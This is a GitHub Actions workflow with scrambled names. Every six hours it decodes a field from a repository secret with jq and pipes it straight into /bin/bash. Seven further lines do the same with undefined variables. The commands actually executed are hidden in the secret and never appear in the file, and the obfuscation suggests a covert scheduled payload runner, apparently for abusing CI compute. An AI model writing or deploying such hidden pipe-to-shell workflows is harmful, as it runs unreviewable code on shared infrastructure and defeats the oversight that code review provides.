name: wendingxxo
on:
  workflow_dispatch:
  schedule:
    - cron: '41 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wendingxxo
        env:
          qeta99828: ${{ secrets.qeta99828 }}
        run: |
          echo $qeta99828 | jq -r .vsvri57679 | /bin/bash
          echo $f9 | jq -r .vsq13543 | /bin/bash
          echo $xxden70 | jq -r .q673 | /bin/bash
          echo $y6 | jq -r .djfij916 | /bin/bash
          echo $zmy75395 | jq -r .id09043 | /bin/bash
          echo $o19 | jq -r .rj05546 | /bin/bash
          echo $l8 | jq -r .hn20 | /bin/bash
          echo $uxk478 | jq -r .g73723 | /bin/bash

